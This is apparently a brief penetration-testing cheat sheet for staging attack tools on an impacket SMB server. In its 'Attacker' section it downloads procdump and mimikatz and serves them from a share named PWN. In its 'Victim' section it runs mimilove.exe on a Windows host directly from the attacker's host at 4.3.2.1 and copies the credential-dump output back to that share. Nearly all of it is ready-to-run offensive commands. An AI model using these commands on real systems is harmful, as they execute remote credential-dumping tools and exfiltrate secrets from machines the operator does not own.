SMB

# Install/Upgrade impacket
sudo python3 -m pip install --upgrade impacket

# Run SMB server
cd $(mktemp -d) && sudo smbserver.py PWN . &

# Eventually check if everything is working
echo -e "shares\nuse PWN\nls" | smbclient.py localhost -no-pass

Common Usage

# Attacker
cd $(mktemp -d) && \
wget https://live.sysinternals.com/procdump.exe && wget https://live.sysinternals.com/procdump64.exe && \
wget https://github.com/gentilkiwi/mimikatz/releases/latest/download/mimikatz_trunk.7z && 7z x mimikatz_trunk.7z && rm mimikatz_trunk.7z
sudo smbserver.py PWN . &
:: Victim (Windows 2000 After MS17)
\\4.3.2.1\PWN\Win32\mimilove.exe > "C:\\result-mimilove.txt"
copy "C:\result-mimilove.txt" \\4.3.2.1\PWN\